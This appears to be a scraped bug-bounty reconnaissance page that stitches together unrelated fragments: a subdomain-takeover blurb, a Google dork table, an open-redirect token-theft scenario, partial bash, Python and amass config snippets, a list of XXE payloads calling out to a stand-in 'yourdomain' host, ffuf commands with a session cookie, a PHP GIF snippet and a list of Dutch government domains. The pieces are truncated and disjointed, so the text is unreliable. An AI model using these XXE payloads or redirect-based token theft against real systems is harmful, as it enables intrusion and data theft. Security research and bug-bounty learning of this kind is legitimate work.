abdulsec abdulsec

Dangling DNS Records on api.techprep.fb.com - $500!

Read proper write-up here: https://publish.whoisbinit.me/subdomain-takeover-on-api-techprep-fb-com-through-aws-elastic-beanstalk

I have included my script in another file (main.sh), which I used in discovering this vulnerability.

I didn't do any form of manual work in finding this vulnerability, and my workflow was fully automated with Bash scripting.

I have shortened my actual script, and only included the part which helped me in finding this vulnerability in the main.sh file.

Google dork cheatsheet

Search filters

Filter	Description	Example
allintext	Searches for occurrences of all the keywords given.	`allintext:"keyword"`
intext	Searches for the occurrences of keywords all at once or one at a time.	`intext:"keyword"`
inurl	Searches for a URL matching one of the keywords.	`inurl:"keyword"`
allinurl	Searches for a URL matching all the keywords in the query.	`allinurl:"keyword"`
intitle	Searches for occurrences of keywords in title all or one.	`intitle:"keyword"`

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
User loads https://example.com/?code=VALUE
Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user
```
GET /verify/VALUE HTTP/1.1
Host: example.com
```

	# Before the first run, read the comments and change the script for your company
	# Before anything, install ffuf with `go install github.com/ffuf/ffuf@latest`

	# Change the WEBROOT variable below to the location of the webroot
	WEBROOT=/var/www/html/CHANGE/ME
	# This changes to the webroot directory
	cd $WEBROOT
	# This makes a directory for storing the files used for this script. Change it to be whatever path you want.
	PROJPATH=/home/changeme/project
	mkdir -p $PROJPATH

	#! /usr/bin/python3

	import http.server, ssl, sys, random, string, argparse, socket

	hostname = "[domain]"
	redirect_enabled = False
	redirect_target = ""
	redirect_token = ""
	manual_redirect_token = False
	redirect_code = 303

	# Copyright 2017-2020 Jeff Foley. All rights reserved.
	# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.

	# Should results only be collected passively and without DNS resolution? Not recommended.
	#mode = passive
	mode = active

	# The directory that stores the Cayley graph database and other output files
	# The default for Linux systems is: $HOME/.config/amass
	#output_directory = amass

	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

	# Basic Usage
	ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080

	# Basic Usage With a Cookie
	ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 -b "laravel_session=eyJpdiI6Ii8wQU11dTVlUkg2alRHUXBIVzlGSnc9PSIsInZhbHVlIjoiOWs3YllJWTdqNC9xa1pMeFRvMFh0OE1vRFpaWm9GSzFkRktVZS9yUHBDM0lIazZ4K0NsbndxWVIxQ05VZWhqZUZaR0RGQWlFdmdDc24yWllYRklGSXI5STd2b05Pam4yRXIwV1BUWkZhUnFLNUFzOWsycmRHcnlxS0FqRWNsSnEiLCJtYWMiOiI3ZTliMmM2YzIxOTExNDE0NmVjYTYyMGI4Nzg4YzJiYjNmNjVkNDI1YzEyODYwMzY5YzczNzY3NTUwZDk0OGYzIn0%3D;"

	# Adding a delay
	ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 –p 1 –t 3

	# Adding a delay (new method)

	<?php

	//php gd-gif.php image.gif gd-image.gif

	$gif = imagecreatefromgif($argv[1]);
	imagegif($gif, $argv[2]);
	imagedestroy($gif);
	?>

	knmi.nl
	rijksoverheid.nl
	overheid.nl
	duo.nl
	politie.nl
	koninklijkhuis.nl
	defensie.nl
	kadaster.nl
	werkenbijdefensie.nl
	cbs.nl